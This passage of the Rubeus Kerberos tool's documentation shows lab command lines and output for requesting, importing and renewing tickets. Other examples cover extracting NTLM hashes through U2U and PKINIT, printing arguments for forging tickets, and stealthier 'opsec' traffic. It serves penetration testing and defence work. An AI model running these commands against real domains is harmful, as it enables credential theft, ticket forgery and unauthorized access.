zAJK6PESaBcUqhKqkjWLUKDuT2+SCduPVF6+3QJB0xLJrwXKp/MiV418H/pHRoy6JkKKw2m1bw45P8Az\r\n l54g75WJqEiAzj/+I64TUfbEFJtd9OHujAKzjMMiKRQKwTKR1Jfb6gTrv6K0GCTJ15W84DeWc47jTutE\r\n HbWxuKib3niTTM5YcHZcN6h/V8Zef8r4fdhY20xGCwqlT9X5md96+647bRq/AZDtiAEaVAH5f3QTQen8\r\n o6XpVqSoZxRASEs3oKFfNunBFJ+QxOL4A47iO1JH0wlM7L2Vx+QeDMfqUh3i9S71YBLdHtPflo8ivmNS\r\n gf0dIeAE2rHRNQn+q7vvrl4r/Bxy3CikzBWnq9Nff8vUJmZ0MQBc4mBpykuuFtLuEJOELdUzW4uCF/9a\r\n JffKDnWk0lIDymImtxqTO0Y/mk0zEQ7RZNUIR3vtrNSO84CjZ/YFYCIdIR5wCzztPSZ0RH7C4lVueBO5\r\n ZoDiWYvPuOQsZHkP2XD+GQtu0hN6MOfLOKGVmNrKs1KRfWhbqnTQudjFSkvgHlgjIslKJDa6WzmSQhdW\r\n fPIA9ggjCmQtyB6seiYi9LdJuQ+GiiF2UphTEJ+a5DR6rGYbg4hhd+ru2Z8Lt5rBojliLnedafyZJ15t\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 12 of 100\n\nalU+n8aNdIPXfVmsR3caTXkncNBlo4HWMIHToAMCAQCigcsEgch9gcUwgcKggb8wgbwwgbmgGzAZoAMC\r\n ARehEgQQ+zY8adXi2NuvkAxl1ohUOKEPGw1URVNUTEFCLkxPQ0FMohIwEKADAgEBoQkwBxsFZGZtLmGj\r\n BwMFAEDhAAClERgPMjAxOTAyMjUyMzA2MDdaphEYDzIwMTkwMjI2MDQwNjA3WqcRGA8yMDE5MDMwNDIz\r\n MDYwN1qoDxsNVEVTVExBQi5MT0NBTKkiMCCgAwIBAqEZMBcbBmtyYnRndBsNdGVzdGxhYi5sb2NhbA==\r\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\n[*] Action: Describe Ticket\r\nUserName : dfm.a\r\nUserRealm : TESTLAB.LOCAL\r\nServiceName : krbtgt/testlab.local\r\nServiceRealm : TESTLAB.LOCAL\r\nStartTime : 2/25/2019 3:06:07 PM\r\nEndTime : 2/25/2019 8:06:07 PM\r\nRenewTill : 3/4/2019 3:06:07 PM\r\nFlags : name_canonicalize, pre_authent, initial, renewable, forwardable\r\nKeyType : rc4_hmac\r\nBase64(key) : +zY8adXi2NuvkAxl1ohUOA==\r\nRequesting a ticket via aes256_hmac hash for dfm.a@testlab.local, starting a new hidden process and applying\r\nthe ticket to that logon session. Note: elevation needed!\r\nC:\\Rubeus\u003eRubeus.exe asktgt /user:dfm.a /domain:testlab.local /aes256:e27b2e7b39f59c3738813a9ba8c20cd5864946f17\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Create Process (/netonly)\r\n[*] Showing process : False\r\n[+] Process : 'C:\\Windows\\System32\\cmd.exe' successfully created with LOGON_TYPE = 9\r\n[+] ProcessID : 7564\r\n[+] LUID : 0x3c4c241\r\n[*] Action: Ask TGT\r\n[*] Using aes256_cts_hmac_sha1 hash: e27b2e7b39f59c3738813a9ba8c20cd5864946f179c80f60067f5cda59c3bd27\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 13 of 100\n\n[*] Target LUID : 63226433\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/ preauth) for: 'testlab.local\\dfm.a'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 234 bytes\r\n[*] Received 1620 bytes\r\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFujCCBbagAwIBBaEDAgEWooIEvzCCBL...(snip)...\r\n[*] Action: Import Ticket\r\n[*] Target LUID: 0x3c4c241\r\n[+] Ticket successfully imported!\r\nNote that the /luid and /createnetonly parameters require elevation!\r\nRequesting a ticket using a certificate and using /getcredentials to retrieve the NT hash:\r\nC:\\Rubeus\u003eRubeus.exe asktgt /user:harmj0y /domain:rubeus.ghostpack.local /dc:pdc1.rubeus.ghostpack.local /getcr\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Ask TGT\r\n[*] Using PKINIT with etype rc4_hmac and subject: CN=Harm J0y, CN=Users, DC=rubeus, DC=ghostpack, DC=local\r\n[*] Building AS-REQ (w/ PKINIT preauth) for: 'rubeus.ghostpack.local\\harmj0y'\r\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n doIF9DCCBfCgAwIBBaEDAgEWooIE7DCCBOhhggTkMIIE4KADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n YnRndBsWcnViZXVzLmdob3N0cGFjay5sb2NhbA==\r\n ServiceName : krbtgt/rubeus.ghostpack.local\r\n ServiceRealm : RUBEUS.GHOSTPACK.LOCAL\r\n UserName : harmj0y\r\n UserRealm : RUBEUS.GHOSTPACK.LOCAL\r\n StartTime : 14/07/2021 02:25:33\r\n EndTime : 14/07/2021 12:25:33\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 14 of 100\n\nRenewTill : 21/07/2021 02:25:33\r\n Flags : name_canonicalize, pre_authent, initial, renewable, forwardable\r\n KeyType : rc4_hmac\r\n Base64(key) : 7MS2ajfZo4HedoK+K3dLcQ==\r\n ASREP (key) : 9B1C28A276FBBE557D0F9EE153FE24E1\r\n[*] Getting credentials using U2U\r\n CredentialInfo :\r\n Version : 0\r\n EncryptionType : rc4_hmac\r\n CredentialData :\r\n CredentialCount : 1\r\n NTLM : C69A7EA908898C23B72E65329AF7E3E8\r\nasktgs\r\nThe asktgs action will build/parse a raw TGS-REQ/TGS-REP service ticket request using the specified TGT\r\n/ticket:X supplied. This value can be a base64 encoding of a .kirbi file or the path to a .kirbi file on disk. If a\r\n/dc is not specified, the computer's current domain controller is extracted and used as the destination for the\r\nrequest traffic. The /ptt flag will \"pass-the-ticket\" and apply the resulting service ticket to the current logon\r\nsession. One or more /service:X SPNs must be specified, comma separated.\r\nThe supported encryption types in the constructed TGS-REQ will be RC4_HMAC,\r\nAES128_CTS_HMAC_SHA1, and AES256_CTS_HMAC_SHA1. In this case, the highest mutually supported\r\nencryption will be used by the KDC to build the returned service ticket. If you want to force DES, RC4, or\r\nAES128/256 keys, use /enctype:[RC4|AES128|AES256|DES] .\r\nIn order to request a service ticket for an account using an enterprise principal (i.e. user@domain.com), the\r\n/enterprise flag can be used.\r\nBy default, several differences exists between TGS-REQ's generated by Rubeus and genuine TGS-REQ's. To form\r\nTGS-REQ's more inline with genuine requests, the /opsec flag can be used, this will also cause an additional\r\nTGS-REQ to be sent automatically when a service ticket is requested for an account configured for unconstrained\r\ndelegation. As this flag is intended to make Rubeus traffic more stealthy, it cannot by default be used with any\r\nencryption type other than aes256 and will just throw a warning and exit if another encryption type is used.\r\nTo play with other scenarios manually, /tgs:X can be used to supply an additional ticket which is appended to\r\nthe request body. This also adds the constrained delegation KDC option as well as avoids dynamically\r\ndetermining the domain from the given SPN /service:X , for this reason the /targetdomain:X argument has\r\nbeen implemented to force the request to use the supplied domain which is useful for requesting delegated service\r\ntickets from a foreign domain or tickets with usual SPNs.\r\nThe /u2u flag was implemented to request User-to-User tickets. Together with the /tgs:X argument (used to\r\nsupply the target accounts TGT), the /service:X argument can be the username of the account the supplied TGT\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 15 of 100\n\nis for (with the /tgs:X argument). The /targetuser:X argument will request a PAC of any other account by\r\ninserting a PA-FOR-USER PA data section with the target user's username.\r\nThe /printargs flag will print the arguments required to forge a ticket with the same PAC values if the PAC is\r\nreadable. This could be done by supplying the /servicekey:X argument or performing a /u2u request with a\r\nknown session key.\r\nUsing a KDC proxy (MS-KKDCP) to make the request is possible using the /proxyurl:URL argument. The full\r\nURL for the KDC proxy is required, eg. https://kdcproxy.exmaple.com/kdcproxy\r\nThe /keyList flag was implemented for Kerberos Key List Requests. These requests must utilise a forged partial\r\nTGT from a read-only domain controller in the /ticket:BASE64|FILE.KIRBI parameter, further details on this\r\nforged TGT in the golden section. Furthermore, the /spn:x field must be set to the KRBTGT SPN within the\r\ndomain, eg. KRBTBT/domain.local.\r\nThe asktgs action also supports requesting service tickets via the Kerberos authentication package using LSASS.\r\nThis mode of operation can be enabled by omitting the /ticket argument. By default, the TGT associated with\r\nthe current logon session is used. An alternative logon session can be targetted by supplying the /luid:xxx\r\nargument. Local administrator privileges are required when targetting other logon sessions. Currently, only simple\r\nservice tickets can be requested via LSASS. Arguments for features such as S4U2Self, U2U, key list and KDC\r\nproxy are ingnored. Requesting service tickets via LSASS can often be more opsec friendly, since Kerberos traffic\r\nwill originate from LSASS. This mode is also required for scenarios where Credential Guard / Remote Credential\r\nGuard is active, since dumping TGT's with credential guard is not possible.\r\nRequesting a TGT for dfm.a and then using that ticket to request a service ticket for the\r\n\"LDAP/primary.testlab.local\" and \"cifs/primary.testlab.local\" SPNs:\r\nC:\\Rubeus\u003eRubeus.exe asktgt /user:dfm.a /rc4:2b576acbe6bcfda7294d6bd18041b8fe\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Ask TGT\r\n[*] Using rc4_hmac hash: 2b576acbe6bcfda7294d6bd18041b8fe\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/ preauth) for: 'testlab.local\\dfm.a'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 230 bytes\r\n[*] Received 1537 bytes\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 16 of 100\n\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFmjCCBZagAwIBBaEDAgEWoo...(snip)...\r\nC:\\Rubeus\u003eRubeus.exe asktgs /ticket:doIFmjCCBZagAwIBBaEDAgEWoo...(snip)... /service:LDAP/primary.testlab.local,c\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Ask TGS\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building TGS-REQ request for: 'LDAP/primary.testlab.local'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 1514 bytes\r\n[*] Received 1562 bytes\r\n[+] TGS request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFzjCCBcqgAwIBBaEDAgEWoo...(snip)...\r\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\n[*] Action: Ask TGS\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building TGS-REQ request for: 'cifs/primary.testlab.local'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 1514 bytes\r\n[*] Received 1562 bytes\r\n[+] TGS request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFzjCCBcqgAwIBBaEDAgEWoo...(snip)...\r\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 17 of 100\n\nC:\\Rubeus\u003eRubeus.exe klist\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: List Kerberos Tickets (Current User)\r\n [0] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/10/2019 6:44:43 PM ; 2/10/2019 11:44:09 PM ; 2/17/2019 6:44:09 PM\r\n Server Name : cifs/primary.testlab.local @ TESTLAB.LOCAL\r\n Client Name : dfm.a @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)\r\n [1] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/10/2019 6:44:43 PM ; 2/10/2019 11:44:09 PM ; 2/17/2019 6:44:09 PM\r\n Server Name : LDAP/primary.testlab.local @ TESTLAB.LOCAL\r\n Client Name : dfm.a @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)\r\nRequesting a service ticket for an AES-enabled service account, specifying that we only support RC4_HMAC:\r\nC:\\Rubeus\u003eRubeus.exe asktgs /ticket:doIFmjCCBZagAwIBBaEDAgEWoo...(snip).../service:roast/me /enctype:rc4\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.1\r\n[*] Action: Ask TGS\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Requesting 'rc4_hmac' etype for the service ticket\r\n[*] Building TGS-REQ request for: 'roast/me'\r\n[+] TGS request successful!\r\n[*] base64(ticket.kirbi):\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 18 of 100\n\ndoIFrjCCBaqgAwIBBaEDA...(snip)...\r\n[*] Action: Describe Ticket\r\nUserName : dfm.a\r\nUserRealm : TESTLAB.LOCAL\r\nServiceName : roast/me\r\nServiceRealm : TESTLAB.LOCAL\r\nStartTime : 2/25/2019 3:10:59 PM\r\nEndTime : 2/25/2019 8:09:54 PM\r\nRenewTill : 3/4/2019 3:09:54 PM\r\nFlags : name_canonicalize, pre_authent, renewable, forwardable\r\nKeyType : rc4_hmac\r\nBase64(key) : Gg3zZicIl5c50KGecCf8XA==\r\nRequesting a user-to-user service ticket and including the PA for User PA-DATA section (an S4U2self request), it\r\nis possible to get a readable PAC for any user:\r\nC:\\Rubeus\u003eRubeus.exe asktgs /u2u /targetuser:ccob /ticket:doIFijCCBYagAwIBBaED...(snip)...3RwYWNrLmxvY2Fs /tgs\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Ask TGS\r\n[*] Using domain controller: PDC1.rubeus.ghostpack.local (192.168.71.80)\r\n[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket\r\n[*] Building User-to-User TGS-REQ request for: 'exploitph'\r\n[+] TGS request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFKzCCBSegAwIBBaEDAgEWooIEKzCCBCdhggQjMIIEH6ADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n cGxvaXRwaA==\r\n ServiceName : exploitph\r\n ServiceRealm : RUBEUS.GHOSTPACK.LOCAL\r\n UserName : ccob\r\n UserRealm : RUBEUS.GHOSTPACK.LOCAL\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 19 of 100\n\nStartTime : 20/07/2021 22:00:07\r\n EndTime : 21/07/2021 07:59:39\r\n RenewTill : 27/07/2021 21:59:39\r\n Flags : name_canonicalize, pre_authent, renewable, forwardable\r\n KeyType : aes256_cts_hmac_sha1\r\n Base64(key) : u2AYdjG4gLNIXqzb3MmwtDtE1k2NR5ty9h80w704+8Q=\r\n Decrypted PAC :\r\n LogonInfo :\r\n LogonTime : 01/01/1601 00:00:00\r\n LogoffTime :\r\n KickOffTime :\r\n PasswordLastSet : 20/07/2021 21:58:44\r\n PasswordCanChange : 21/07/2021 21:58:44\r\n PasswordMustChange : 31/08/2021 21:58:44\r\n EffectiveName : ccob\r\n FullName : C Cob\r\n LogonScript :\r\n ProfilePath :\r\n HomeDirectory :\r\n HomeDirectoryDrive :\r\n LogonCount : 0\r\n BadPasswordCount : 0\r\n UserId : 1109\r\n PrimaryGroupId : 513\r\n GroupCount : 1\r\n Groups : 513\r\n UserFlags : (32) EXTRA_SIDS\r\n UserSessionKey : 0000000000000000\r\n LogonServer : PDC1\r\n LogonDomainName : RUBEUS\r\n LogonDomainId : S-1-5-21-3237111427-1607930709-3979055039\r\n UserAccountControl : (16) NORMAL_ACCOUNT\r\n ExtraSIDCount : 1\r\n ExtraSIDs : S-1-18-2\r\n ResourceGroupCount : 0\r\n ClientName :\r\n Client Id : 20/07/2021 21:59:39\r\n Client Name : ccob\r\n UpnDns :\r\n DNS Domain Name : RUBEUS.GHOSTPACK.LOCAL\r\n UPN : ccob@rubeus.ghostpack.local\r\n Flags : 0\r\n ServerChecksum :\r\n Signature Type : KERB_CHECKSUM_HMAC_MD5\r\n Signature : 79A2DC5595C76FA85155B4C65B3A0EE1 (VALID)\r\n KDCChecksum :\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 20 of 100\n\nSignature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n Signature : DA57618BB48EA56371E374B1 (UNVALIDATED)\r\nIf the PAC can be decrypted (by using a user-to-user request or by passing the /servicekey ) is it possible to\r\nprint the arguments required to forge a ticket containg the same PAC values:\r\nC:\\Rubeus\u003eRubeus.exe asktgs /service:roast/me /printargs /servicekey:9FFB199F118556F579B415270EE835005227FCBF29\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Ask TGS\r\n[*] Using domain controller: PDC1.rubeus.ghostpack.local (192.168.71.80)\r\n[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket\r\n[*] Building TGS-REQ request for: 'roast/me'\r\n[+] TGS request successful!\r\n[*] base64(ticket.kirbi):\r\n doIF6jCCBeagAwIBBaEDAgEWooIE5zCCBONhggTfMIIE26ADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n AgECoQ0wCxsFcm9hc3QbAm1l\r\n ServiceName : roast/me\r\n ServiceRealm : RUBEUS.GHOSTPACK.LOCAL\r\n UserName : harmj0y\r\n UserRealm : RUBEUS.GHOSTPACK.LOCAL\r\n StartTime : 20/07/2021 00:02:27\r\n EndTime : 20/07/2021 09:57:46\r\n RenewTill : 26/07/2021 23:57:46\r\n Flags : name_canonicalize, pre_authent, renewable, forwardable\r\n KeyType : aes256_cts_hmac_sha1\r\n Base64(key) : U9Vnk0QnOmByQqF7i+5ujkinm9pRrevcRhw1sKVEVi4=\r\n Decrypted PAC :\r\n LogonInfo :\r\n LogonTime : 19/07/2021 23:00:38\r\n LogoffTime :\r\n KickOffTime :\r\n PasswordLastSet : 14/07/2021 02:07:12\r\n PasswordCanChange : 15/07/2021 02:07:12\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 21 of 100\n\nPasswordMustChange :\r\n EffectiveName : harmj0y\r\n FullName : Harm J0y\r\n LogonScript :\r\n ProfilePath :\r\n HomeDirectory :\r\n HomeDirectoryDrive :\r\n LogonCount : 8\r\n BadPasswordCount : 0\r\n UserId : 1106\r\n PrimaryGroupId : 513\r\n GroupCount : 1\r\n Groups : 513\r\n UserFlags : (32) EXTRA_SIDS\r\n UserSessionKey : 0000000000000000\r\n LogonServer : PDC1\r\n LogonDomainName : RUBEUS\r\n LogonDomainId : S-1-5-21-3237111427-1607930709-3979055039\r\n UserAccountControl : (528) NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD\r\n ExtraSIDCount : 1\r\n ExtraSIDs : S-1-18-1\r\n ResourceGroupCount : 0\r\n CredentialInfo :\r\n Version : 0\r\n EncryptionType : rc4_hmac\r\n CredentialData : *** NO KEY ***\r\n ClientName :\r\n Client Id : 19/07/2021 23:57:46\r\n Client Name : harmj0y\r\n UpnDns :\r\n DNS Domain Name : RUBEUS.GHOSTPACK.LOCAL\r\n UPN : harmj0y@rubeus.ghostpack.local\r\n Flags : 0\r\n ServerChecksum :\r\n Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n Signature : 96FA020562EE73B38D31AEEF (VALID)\r\n KDCChecksum :\r\n Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n Signature : E7FDCBAF5F580DFB567DF102 (UNVALIDATED)\r\n[*] Printing argument list for use with Rubeus' 'golden' or 'silver' commands:\r\n/user:harmj0y /id:1106 /pgid:513 /logoncount:8 /badpwdcount:0 /sid:S-1-5-21-3237111427-1607930709-3979055039 /ne\r\nUsing PKINIT to request a TGT and then requesting a user-to-user service ticket to gain access to the NTLM hash\r\nstored within the PAC (manually performing the /getcredentials flag to asktgt):\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 22 of 100\n\nC:\\Rubeus\u003eRubeus.exe asktgs /u2u /asrepkey:CC9D16AB01D1BD0EF9EBD53C8AD536D9 /ticket:doIF9DCCBfCgAwIBBaED...(sni\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Ask TGS\r\n[*] Using domain controller: PDC1.rubeus.ghostpack.local (192.168.71.80)\r\n[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket\r\n[*] Building User-to-User TGS-REQ request for: 'harmj0y'\r\n[+] TGS request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFxTCCBcGgAwIBBaEDAgEWooIE1DCCBNBhggTMMIIEyKADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n RVVTLkdIT1NUUEFDSy5MT0NBTKkUMBKgAwIBAaELMAkbB2hhcm1qMHk=\r\n ServiceName : harmj0y\r\n ServiceRealm : RUBEUS.GHOSTPACK.LOCAL\r\n UserName : harmj0y\r\n UserRealm : RUBEUS.GHOSTPACK.LOCAL\r\n StartTime : 19/07/2021 23:01:05\r\n EndTime : 20/07/2021 09:00:38\r\n RenewTill : 26/07/2021 23:00:38\r\n Flags : name_canonicalize, pre_authent, renewable, forwardable\r\n KeyType : rc4_hmac\r\n Base64(key) : Qm9zdwFIINSHAAmqaviuEw==\r\n ASREP (key) : CC9D16AB01D1BD0EF9EBD53C8AD536D9\r\n Decrypted PAC :\r\n LogonInfo :\r\n LogonTime : 19/07/2021 22:59:21\r\n LogoffTime :\r\n KickOffTime :\r\n PasswordLastSet : 14/07/2021 02:07:12\r\n PasswordCanChange : 15/07/2021 02:07:12\r\n PasswordMustChange :\r\n EffectiveName : harmj0y\r\n FullName : Harm J0y\r\n LogonScript :\r\n ProfilePath :\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 23 of 100\n\nHomeDirectory :\r\n HomeDirectoryDrive :\r\n LogonCount : 7\r\n BadPasswordCount : 0\r\n UserId : 1106\r\n PrimaryGroupId : 513\r\n GroupCount : 1\r\n Groups : 513\r\n UserFlags : (32) EXTRA_SIDS\r\n UserSessionKey : 0000000000000000\r\n LogonServer : PDC1\r\n LogonDomainName : RUBEUS\r\n LogonDomainId : S-1-5-21-3237111427-1607930709-3979055039\r\n UserAccountControl : (528) NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD\r\n ExtraSIDCount : 1\r\n ExtraSIDs : S-1-18-1\r\n ResourceGroupCount : 0\r\n CredentialInfo :\r\n Version : 0\r\n EncryptionType : rc4_hmac\r\n CredentialData :\r\n CredentialCount : 1\r\n NTLM : C69A7EA908898C23B72E65329AF7E3E8\r\n ClientName :\r\n Client Id : 19/07/2021 23:00:38\r\n Client Name : harmj0y\r\n UpnDns :\r\n DNS Domain Name : RUBEUS.GHOSTPACK.LOCAL\r\n UPN : harmj0y@rubeus.ghostpack.local\r\n Flags : 0\r\n ServerChecksum :\r\n Signature Type : KERB_CHECKSUM_HMAC_MD5\r\n Signature : ADEC4A1A7DF70D0A61047E510E778454 (VALID)\r\n KDCChecksum :\r\n Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n Signature : 6CF688E02147BEEC168E0125 (UNVALIDATED)\r\n**Note The /asrepkey from the TGT retrival must be passed to decrypted the CredentialData section where the\r\nNTLM hash is stored but the /servicekey argument is not required here as the session key from the TGT is\r\nbeing used because it is a user-to-user request.\r\nRequesting a service ticket using the current logged on session:\r\nRubeus.exe asktgs /service:LDAP/dc.ghostpack.local /nowrap\r\n ______ _\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 24 of 100\n\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.3.3\r\n[*] Action: Ask TGS\r\n[=] Requesting service ticket via LSA authentication package 2 using handle 0x9625072\r\n[*] base64(ticket.kirbi):\r\n doIGvDCCBrigAwIBBaEDAg(..snip..)\r\n ServiceName : LDAP/dc.ghostpack.local\r\n ServiceRealm : GHOSTPACK.LOCAL\r\n UserName : CCob (NT_PRINCIPAL)\r\n UserRealm : GHOSTPACK.LOCAL\r\n StartTime : 25/02/2025 09:08:11\r\n EndTime : 25/02/2025 18:48:39\r\n RenewTill : 03/03/2025 12:47:40\r\n Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable\r\n KeyType : aes256_cts_hmac_sha1\r\n Base64(key) : k2xUOHFN1Xg(...snip...)\r\nRequesting local computer account TGT via renewal. Requires local administrator access. If credential guard is\r\npresent, ticket use will not be possible away from the host.\r\nRubeus.exe asktgs /service:krbtgt/ghostpack.local /luid:0x3e7\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.3.3\r\n[*] Action: Ask TGS\r\n[=] Requesting service ticket via LSA authentication package 2 using handle 0x10441184\r\n[*] base64(ticket.kirbi):\r\n doIGuTCCBrWg(...snip...)IFhb3MuZGV2\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 25 of 100\n\nServiceName : krbtgt/ghostpack.local\r\n ServiceRealm : GHOSTPACK.LOCAL\r\n UserName : DC$ (NT_PRINCIPAL)\r\n UserRealm : GHOSTPACK.LOCAL\r\n StartTime : 25/02/2025 09:18:37\r\n EndTime : 25/02/2025 11:35:10\r\n RenewTill : 02/03/2025 10:35:06\r\n Flags : name_canonicalize, pre_authent, renewable, forwardable\r\n KeyType : aes256_cts_hmac_sha1\r\n Base64(key) : k2xUOHFN1Xg(...snip...)\r\nrenew\r\nThe renew action will build/parse a raw TGS-REQ/TGS-REP TGT renewal exchange using the specified\r\n/ticket:X supplied. This value can be a base64 encoding of a .kirbi file or the path to a .kirbi file on disk. If a\r\n/dc is not specified, the computer's current domain controller is extracted and used as the destination for the\r\nrenewal traffic. The /ptt flag will \"pass-the-ticket\" and apply the resulting Kerberos credential to the current\r\nlogon session.\r\nNote that TGTs MUST be renewed before their EndTime, within the RenewTill window.\r\nC:\\Rubeus\u003eRubeus.exe renew /ticket:ticket.kirbi /ptt\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Renew TGT\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building TGS-REQ renewal for: 'TESTLAB.LOCAL\\dfm.a'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 1506 bytes\r\n[*] Received 1510 bytes\r\n[+] TGT renewal request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFmjCCBZagAwIBBaEDAgEWoo...(snip)...\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 26 of 100\n\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\nThe /autorenew flag will take an existing /ticket:X .kirbi file/blob, sleep until endTime-30 minutes, auto-renew the ticket and display the refreshed ticket blob. It will continue this renewal process until the allowable\r\nrenew-till renewal window passes.\r\nC:\\Rubeus\u003eRubeus.exe renew /ticket:doIFmjCCBZagAwIBBaEDAgEWoo...(snip)... /autorenew\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v1.3.3\r\n[*] Action: Auto-Renew TGT\r\n[*] User : dfm.a@TESTLAB.LOCAL\r\n[*] endtime : 2/10/2019 11:44:09 